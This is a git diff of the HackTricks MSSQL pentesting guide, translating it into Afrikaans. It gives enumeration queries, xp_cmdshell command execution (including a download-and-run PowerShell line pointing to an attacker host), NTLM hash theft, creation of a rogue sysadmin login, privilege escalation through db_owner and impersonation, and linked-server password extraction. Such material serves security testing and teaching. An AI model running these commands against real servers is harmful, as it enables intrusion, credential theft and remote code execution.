[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index bf671da8d..2eb3ad4ca 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -2,64 +2,59 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): +Van [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): -> **Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).\ - -**Default port:** 1433 +> **Microsoft SQL Server** is 'n **relasionele databasis**-bestuurstelsel wat deur Microsoft ontwikkel is. Dit is 'n sagtewareproduk met die primêre funksie om data te stoor en op te haal soos versoek deur ander sagtewaretoepassings—wat óf op dieselfde rekenaar óf op 'n ander rekenaar oor 'n netwerk (insluitend die internet) kan loop. +**Verstekpoort:** 1433 ``` 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM ``` +### **Verstek MS-SQL Stelsel Tabelle** -### **Default MS-SQL System Tables** - -* **master Database**: This database is crucial as it captures all system-level details for a SQL Server instance. -* **msdb Database**: SQL Server Agent utilizes this database to manage scheduling for alerts and jobs. -* **model Database**: Acts as a blueprint for every new database on the SQL Server instance, where any alterations like size, collation, recovery model, and more are mirrored in newly created databases. -* **Resource Database**: A read-only database that houses system objects that come with SQL Server. These objects, while stored physically in the Resource database, are logically presented in the sys schema of every database. -* **tempdb Database**: Serves as a temporary storage area for transient objects or intermediate result sets. +* **master Databasis**: Hierdie databasis is krities omdat dit alle stelselvlak besonderhede vir 'n SQL Server instansie vasvang. +* **msdb Databasis**: SQL Server Agent maak gebruik van hierdie databasis om skedulering vir waarskuwings en take te bestuur. +* **model Databasis**: Tree op as 'n bloudruk vir elke nuwe databasis op die SQL Server instansie, waar enige veranderinge soos grootte, sortering, herstelmodel, en meer in nuut geskepte databasisse weerspieël word. +* **Resource Databasis**: 'n Lees-slegs databasis wat stelselvoorwerpe bevat wat met SQL Server saamkom. Hierdie voorwerpe, alhoewel fisies in die Resource databasis gestoor word, word logies voorgestel in die sys skema van elke databasis. +* **tempdb Databasis**: Diens as 'n tydelike bergingsarea vir tydelike voorwerpe of tussenresultate. -## Enumeration +## Opname -### Automatic Enumeration - -If you don't know nothing about the service: +### Outomatiese Opname +As jy niks weet van die diens nie: ```bash nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 msf> use auxiliary/scanner/mssql/mssql_ping ``` - {% hint style="info" %} -If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username. +As jy **nie** **geloofsbriewe het** nie, kan jy probeer om dit te raai. Jy kan nmap of metasploit gebruik. Wees versigtig, jy kan **rekeninge blokkeer** as jy verskeie kere probeer om in te teken met 'n bestaande gebruikersnaam en misluk. {% endhint %} -#### Metasploit (need creds) - +#### Metasploit (benodig geloofsbriewe) ```bash #Set USERNAME, RHOSTS and PASSWORD #Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used @@ -91,13 +86,11 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload #Add new admin user from meterpreter session msf> use windows/manage/mssql_local_auth_bypass ``` - ### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server) -### Manual Enumeration - -#### Login +### Handmatige Opsomming +#### Aantekening ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ @@ -107,14 +100,128 @@ mssqlclient.py [-db volume] -windows-auth /:@ # Using sqsh sqsh -S -U -P -D ## In case Windows Auth using "." as domain name for local user -sqsh -S -U .\\ -P -D +sqsh -S -U .\\ -P -D ## In sqsh you need to use GO after writting the query to send it 1> select 1; 2> go ``` +#### Algemene Opsomming -#### Common Enumeration +##### MSSQL Server Version Detection +Om die weergawe van die MSSQL-diens te bepaal, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in die SQL Server Management Studio (SSMS): + +```sql +SELECT @@VERSION; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT @@VERSION" +``` + +##### Lys van databasisse + +Om 'n lys van databasisse op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +SELECT name FROM sys.databases; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT name FROM sys.databases" +``` + +##### Lys van tabelle in 'n spesifieke databasis + +Om 'n lys van tabelle in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.tables; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.tables" +``` + +##### Lys van kolomme in 'n spesifieke tabel + +Om 'n lys van kolomme in 'n spesifieke tabel op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.columns WHERE object_id = OBJECT_ID(''); +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.columns WHERE object_id = OBJECT_ID('')" +``` + +##### Lys van stored procedures in 'n spesifieke databasis + +Om 'n lys van stored procedures in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.procedures; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.procedures" +``` + +##### Lys van gebruikers in 'n spesifieke databasis + +Om 'n lys van gebruikers in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.sysusers WHERE issqlrole = 0 AND isntname = 1; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.sysusers WHERE issqlrole = 0 AND isntname = 1" +``` + +##### Lys van SQL Server-logins + +Om 'n lys van SQL Server-logins op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +SELECT name FROM sys.syslogins; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT name FROM sys.syslogins" +``` ```sql # Get version select @@version; @@ -136,23 +243,21 @@ select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!' EXEC sp_addsrvrolemember 'hacker', 'sysadmin' ``` - -#### Get User +#### Kry Gebruiker {% content-ref url="types-of-mssql-users.md" %} [types-of-mssql-users.md](types-of-mssql-users.md) {% endcontent-ref %} - ```sql # Get all the users and roles select * from sys.database_principals; ## This query filters a bit the results select name, - create_date, - modify_date, - type_desc as type, - authentication_type_desc as authentication_type, - sid +create_date, +modify_date, +type_desc as type, +authentication_type_desc as authentication_type, +sid from sys.database_principals where type not in ('A', 'R') order by name; @@ -162,20 +267,18 @@ order by name; EXEC sp_helpuser SELECT * FROM sysusers ``` +#### Kry Toestemmings -#### Get Permissions +1. **Beveiligbaar:** Gedefinieer as die hulpbronne wat deur SQL Server bestuur word vir toegangsbeheer. Hierdie word gekategoriseer as: +- **Bediener** - Voorbeelde sluit databasisse, logins, eindpunte, beskikbaarheidsgroepe en bedienersrolle in. +- **Databasis** - Voorbeelde dek databasisrolle, toepassingsrolle, skemas, sertifikate, volledige tekskatalogusse en gebruikers. +- **Skema** - Sluit tabelle, aansigte, prosedures, funksies, sinonieme, ens. in. -1. **Securable:** Defined as the resources managed by SQL Server for access control. These are categorized into: - - **Server** – Examples include databases, logins, endpoints, availability groups, and server roles. - - **Database** – Examples cover database role, application roles, schema, certificates, full text catalogs, and users. - - **Schema** – Includes tables, views, procedures, functions, synonyms, etc. - -2. **Permission:** Associated with SQL Server securables, permissions such as ALTER, CONTROL, and CREATE can be granted to a principal. Management of permissions occurs at two levels: - - **Server Level** using logins - - **Database Level** using users - -3. **Principal:** This term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. The control over access to securables is exercised through the granting or denying of permissions or by including logins and users in roles equipped with access rights. +2. **Toestemming:** Verband hou met SQL Server beveiligbare, toestemmings soos ALTER, CONTROL en CREATE kan aan 'n beginsel verleen word. Bestuur van toestemmings vind plaas op twee vlakke: +- **Bedienervlak** met behulp van logins +- **Databasisvlak** met behulp van gebruikers +3. **Beginsel:** Hierdie term verwys na die entiteit wat toestemming verleen word tot 'n beveiligbare. Beginsels sluit hoofsaaklik logins en databasisgebruikers in. Die beheer oor toegang tot beveiligbare word uitgeoefen deur die verlening of weiering van toestemmings of deur logins en gebruikers in rolle met toegangsregte in te sluit. ```sql # Show all different securables names SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT); @@ -195,20 +298,17 @@ SELECT IS_SRVROLEMEMBER('sysadmin'); Use master EXEC sp_helprotect 'xp_cmdshell' ``` +## Truuks -## Tricks - -### Execute OS Commands +### Voer OS-opdragte uit {% hint style="danger" %} -Note that in order to be able to execute commands it's not only necessary to have **`xp_cmdshell`** **enabled**, but also have the **EXECUTE permission on the `xp_cmdshell` stored procedure**. You can get who (except sysadmins) can use **`xp_cmdshell`** with: - +Let daarop dat dit nie net nodig is om opdragte uit te voer nie, maar ook om die **`xp_cmdshell`** **ingeskakel** te hê, en ook die **UITVOER-bevoegdheid op die `xp_cmdshell`-gebergte prosedure** te hê. Jy kan sien wie (behalwe sysadmins) **`xp_cmdshell`** kan gebruik met: ```sql Use master EXEC sp_helprotect 'xp_cmdshell' ``` {% endhint %} - ```bash # Username + Password + CMD command crackmapexec mssql -d -u -p -x "whoami" @@ -236,11 +336,9 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 # Bypass blackisted "EXEC xp_cmdshell" '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` +### Steel NetNTLM hash / Relay aanval -### Steal NetNTLM hash / Relay attack - -You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example). - +Jy moet 'n **SMB-bediener** begin om die hash wat in die outentifikasie gebruik word, vas te vang (`impacket-smbserver` of `responder` byvoorbeeld). ```bash xp_dirtree '\\\any\thing' exec master.dbo.xp_dirtree '\\\any\thing' @@ -252,10 +350,8 @@ sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` - {% hint style="warning" %} -You can check if who (apart sysadmins) has permissions to run those MSSQL functions with: - +Jy kan nagaan wie (behalwe vir sysadmins) toestemming het om daardie MSSQL funksies uit te voer met: ```sql Use master; EXEC sp_helprotect 'xp_dirtree'; @@ -264,25 +360,24 @@ EXEC sp_helprotect 'xp_fileexist'; ``` {% endhint %} -Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ -You can see how to use these tools in: +Deur gebruik te maak van hulpmiddels soos **responder** of **Inveigh**, is dit moontlik om die NetNTLM-hash te **steel**.\ +Jy kan sien hoe om hierdie hulpmiddels te gebruik in: {% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} -### Abusing MSSQL trusted Links +### Misbruik van MSSQL vertroue skakels -[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:** +[**Lees hierdie berig**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **om meer inligting te vind oor hoe om hierdie funksie te misbruik:** {% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %} [abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) {% endcontent-ref %} -### **Write Files** - -To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file: +### **Skryf Lêers** +Om lêers te skryf met behulp van `MSSQL`, moet ons **Ole Automation Procedures** [**aktiveer**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), wat admin-voorregte vereis, en dan sekere gestoorde prosedures uitvoer om die lêer te skep: ```bash # Enable Ole Automation Procedures sp_configure 'show advanced options', 1 @@ -300,38 +395,34 @@ EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, ') -Example using configured python to perform several actions: - +Voorbeeld van die gebruik van gekonfigureerde python om verskeie aksies uit te voer: ```sql # Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' @@ -345,12 +436,11 @@ print(sys.version) ' GO ``` +### Lees Register -### Read Registry +Microsoft SQL Server bied **verskeie uitgebreide gestoorde prosedures** wat jou in staat stel om te kommunikeer met nie net die netwerk nie, maar ook die lêersisteem en selfs die [**Windows Register**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:** -Microsoft SQL Server provides **multiple extended stored procedures** that allow you to interact with not only the network but also the file system and even the [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:** - -| **Regular** | **Instance-Aware** | +| **Gewone** | **Instansie-Bewus** | | ---------------------------- | -------------------------------------- | | sys.xp\_regread | sys.xp\_instance\_regread | | sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues | @@ -360,7 +450,6 @@ Microsoft SQL Server provides **multiple extended stored procedures** that allow | sys.xp\_regdeletekey | sys.xp\_instance\_regdeletekey | | sys.xp\_regaddmultistring | sys.xp\_instance\_regaddmultistring | | sys.xp\_regremovemultistring | sys.xp\_instance\_regremovemultistring | - ```sql # Example read registry EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory'; @@ -372,34 +461,32 @@ Use master; EXEC sp_helprotect 'xp_regread'; EXEC sp_helprotect 'xp_regwrite'; ``` +Vir **meer voorbeelde** kyk na die [**oorspronklike bron**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). -For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). +### RCE met MSSQL Gebruiker Gedefinieerde Funksie - SQLHttp -### RCE with MSSQL User Defined Function - SQLHttp +Dit is moontlik om 'n .NET dll binne MSSQL te **laai met aangepaste funksies**. Dit vereis egter `dbo` toegang, so jy benodig 'n verbinding met die databasis **as `sa` of 'n Administrateur rol**. -It's possible to **load a .NET dll within MSSQL with custom functions**. This, however, **requires `dbo` access** so you need a connection with database **as `sa` or an Administrator role**. +[**Volg hierdie skakel**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) om 'n voorbeeld te sien. -[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example. +### Ander maniere vir RCE -### Other ways for RCE - -There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). +Daar is ander metodes om opdrag uitvoering te kry, soos die byvoeging van [uitgebreide gestoorde prosedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR-versamelings](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), en [eksterne skripte](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) vandag. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## MSSQL Privilege Escalation +## MSSQL Bevoorregte Eskalasie -### From db\_owner to sysadmin - -If a **regular user** is given the role **`db_owner`** over the **database owned by an admin** user (such as **`sa`**) and that database is configured as **`trustworthy`**, that user can abuse these privileges to **privesc** because **stored procedures** created in there that can **execute** as the owner (**admin**). +### Van db\_owner tot sysadmin +As 'n **gewone gebruiker** die rol **`db_owner`** oor die **databasis wat deur 'n administrateur** gebruiker besit word (soos **`sa`**) gegee word en daardie databasis is gekonfigureer as **`trustworthy`**, kan daardie gebruiker hierdie voorregte misbruik om **bevoorregte eskalasie** te bewerkstellig omdat **gestoorde prosedures** wat daar geskep is, uitgevoer kan word as die eienaar (**administrateur**). ```sql # Get owners of databases SELECT suser_sname(owner_sid) FROM sys.databases @@ -433,25 +520,19 @@ EXEC sp_elevate_me --3. Verify your user is a sysadmin SELECT is_srvrolemember('sysadmin') ``` - -You can use a **metasploit** module: - +Jy kan 'n **metasploit** module gebruik: ```bash msf> use auxiliary/admin/mssql/mssql_escalate_dbowner ``` - -Or a **PS** script: - +Of 'n **PS** skrip: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1 Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1 Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184 ``` +### Impersonasie van ander gebruikers -### Impersonation of other users - -SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends. - +SQL Server het 'n spesiale toestemming, genaamd **`IMPERSONATE`**, wat **die uitvoerende gebruiker toelaat om die toestemmings van 'n ander gebruiker** of aanmelding oor te neem totdat die konteks herstel word of die sessie eindig. ```sql # Find users you can impersonate SELECT distinct b.name @@ -466,13 +547,11 @@ EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') ``` - {% hint style="info" %} -If you can impersonate a user, even if he isn't sysadmin, you should check i**f the user has access** to other **databases** or linked servers. +As jy 'n gebruiker kan voorstel, selfs al is hy nie 'n sysadmin nie, moet jy nagaan of die gebruiker toegang het tot ander databasisse of gekoppelde bedieners. {% endhint %} -Note that once you are sysadmin you can impersonate any other one: - +Merk op dat sodra jy 'n sysadmin is, kan jy enige ander een voorstel: ```sql -- Impersonate RegUser EXECUTE AS LOGIN = 'RegUser' @@ -482,49 +561,44 @@ SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT ``` - -You can perform this attack with a **metasploit** module: - +Jy kan hierdie aanval uitvoer met 'n **metasploit** module: ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` - -or with a **PS** script: - +of met 'n **PS** skrip: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1 Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1 Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! ``` - -## Using MSSQL for Persistence +## Gebruik van MSSQL vir Volharding [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/) -## Extracting passwords from SQL Server Linked Servers -An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. -The script to extract and decrypt the passwords stored for the Linked Servers can be found [here](https://www.richardswinbank.net/admin/extract_linked_server_passwords) +## Uittrekking van wagwoorde vanaf SQL Server Gekoppelde Bedieners +'n Aanvaller kan SQL Server Gekoppelde Bedieners wagwoorde uittrek uit die SQL-instanties en dit in duidelike teks verkry, wat die aanvaller wagwoorde gee wat gebruik kan word om 'n groter voet aan die doel te kry. +Die skrip om die wagwoorde wat vir die Gekoppelde Bedieners gestoor word, uit te trek en te ontsluit, kan [hier](https://www.richardswinbank.net/admin/extract_linked_server_passwords) gevind word. -Some requirements, and configurations must be done in order for this exploit to work. -First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server Configurations. +Sekere vereistes en konfigurasies moet gedoen word sodat hierdie uitbuitwerk kan werk. +Eerstens moet jy Administrateur-regte op die masjien hê, of die vermoë om die SQL Server-konfigurasies te bestuur. -After validating your permissions, you need to configure three things, which are the following: -1. Enable TCP/IP on the SQL Server instances; -2. Add a Start Up parameter, in this case, a trace flag will be added, which is -T7806. -3. Enable remote admin connection. +Nadat jou regte geverifieer is, moet jy drie dinge konfigureer, naamlik: +1. Skakel TCP/IP in op die SQL Server-instanties; +2. Voeg 'n Beginparameter by, in hierdie geval sal 'n spoorvlag bygevoeg word, naamlik -T7806. +3. Skakel die afgeleë administratiewe verbinding in. -To automate these configurations, [this repository ](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) has the needed scripts. -Besides having a powershell script for each step of the configuration, the repository also has a full script which combines the configuration scripts and the extraction and decryption of the passwords. +Om hierdie konfigurasies outomaties te maak, het [hierdie bewaarplek](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) die nodige skripte. +Behalwe dat daar 'n PowerShell-skrip vir elke stap van die konfigurasie is, het die bewaarplek ook 'n volledige skrip wat die konfigurasieskripte en die uittrekking en ontsluiting van die wagwoorde kombineer. -For further information, refer to the following links regarding this attack: -[Decrypting MSSQL Database Link Server Passwords](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) +Vir verdere inligting, verwys na die volgende skakels met betrekking tot hierdie aanval: +[Ontsluiting van MSSQL-databasis Gekoppelde Bediener Wagwoorde](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) -[Troubleshooting the SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) +[Foutopsporing van die SQL Server Toegewyde Administratiewe Verbinding](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) -## Local Privilege Escalation +## Plaaslike Bevoorregte Eskalasie -The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\ -You probably will be able to **escalate to Administrator** following one of these 2 paged: +Die gebruiker wat die MSSQL-bediener hardloop, sal die voorregtoken **SeImpersonatePrivilege** geaktiveer hê.\ +Jy sal waarskynlik kan **eskaleer na Administrateur** deur een van hierdie 2 bladsye te volg: {% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md) @@ -538,7 +612,7 @@ You probably will be able to **escalate to Administrator** following one of thes * `port:1433 !HTTP` -## References +## Verwysings * [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) * [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) @@ -552,80 +626,78 @@ You probably will be able to **escalate to Administrator** following one of thes
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: MSSQL #Protocol Abbreviation if there is one. Port_Number: 1433 #Comma separated if there is more than one. Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for MSSQL - Note: | - Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). +Name: Notes +Description: Notes for MSSQL +Note: | +Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). - #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G +#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G - ###the goal is to get xp_cmdshell working### - 1. try and see if it works - xp_cmdshell `whoami` - go +###the goal is to get xp_cmdshell working### +1. try and see if it works +xp_cmdshell `whoami` +go - 2. try to turn component back on - EXEC 